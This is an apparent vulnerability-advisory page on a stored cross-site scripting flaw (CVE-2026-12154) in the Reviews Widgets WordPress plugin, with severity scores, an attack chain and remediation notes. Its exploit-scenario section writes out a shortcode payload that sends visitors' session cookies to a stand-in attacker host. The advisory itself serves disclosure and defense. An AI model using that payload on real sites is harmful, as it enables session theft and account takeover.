Skip to main content

Reviews Widgets Plugin CVE-2026-12154

| EUVDEUVD-2026-41894 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-07-06 Wordfence GHSA-7g4w-hpm5-fjj3
6.4
CVSS 3.1 · Vendor: Wordfence
Share

Severity by source

Vendor (Wordfence) PRIMARY
6.4 MEDIUM
AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
vuln.today AI
5.4 MEDIUM

PR:L reflects required contributor auth; UI:R because a victim must visit the injected page; S:C for cross-context browser execution; no availability impact.

3.1 AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (Wordfence).

CVSS VectorVendor: Wordfence

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Confidentiality
Low
Integrity
Low
Availability
None

Lifecycle Timeline

2
Analysis Generated
Jul 06, 2026 - 18:34 vuln.today
CVE Published
Jul 06, 2026 - 17:31 nvd
MEDIUM 6.4

DescriptionCVE.org

The Reviews Widgets for Google, Yelp & TripAdvisor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'page_id' shortcode attribute of the [fbrev] shortcode in versions up to and including 2.7.3. This is due to insufficient input sanitization and output escaping in the Feed_Shortcode::fbrev() method, which passes the raw shortcode attribute through Feed_Old::get_feed() into the View::render() method, where it is echoed directly into the data-id HTML attribute without esc_attr(). This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

AnalysisAI

Stored Cross-Site Scripting in the Reviews Widgets for Google, Yelp & TripAdvisor WordPress plugin (versions up to and including 2.7.3) allows authenticated attackers with contributor-level access to inject persistent malicious scripts into pages by abusing the 'page_id' attribute of the [fbrev] shortcode. The injected payload executes in the browsers of any user who subsequently visits the affected page, enabling session hijacking, credential theft, or further exploitation within the victim's browser context. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Obtain contributor-level WordPress account
Delivery
Craft [fbrev] shortcode with malicious page_id payload
Exploit
Embed shortcode in post and publish
Install
Victim user visits injected page
C2
Browser echoes unsanitized data-id attribute
Execute
XSS payload executes in victim browser context
Impact
Session cookies or credentials exfiltrated

Vulnerability AssessmentAI

Exploitation Exploitation requires an authenticated WordPress account with at minimum contributor-level role, which grants the ability to create and submit posts containing shortcodes. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The NVD/Wordfence-assigned CVSS base score of 6.4 (AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N) overstates exploitability slightly: the UI:N metric is debatable for stored XSS, since a victim must navigate to the injected page before execution occurs - traditional CVSS guidance treats this as UI:R, which would reduce the score to approximately 5.4. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker with a contributor-level WordPress account creates or edits a post embedding the [fbrev page_id='<script>document.location="https://attacker.example/steal?c="+document.cookie</script>'] shortcode. When any authenticated user - including an administrator - subsequently visits the published page, the unsanitized payload executes in their browser, exfiltrating session cookies to the attacker's server and enabling session takeover. …
Remediation An upstream code change is available via the WordPress plugin Trac changeset (revision 3593292 from 3451654 at plugins.trac.wordpress.org/changeset?new=3593292%40fb-reviews-widget&old=3451654%40fb-reviews-widget); however, the exact patched release version is not independently confirmed from the provided input data - upgrade to the latest available version from the WordPress plugin repository and verify the fix is present. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-12154 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy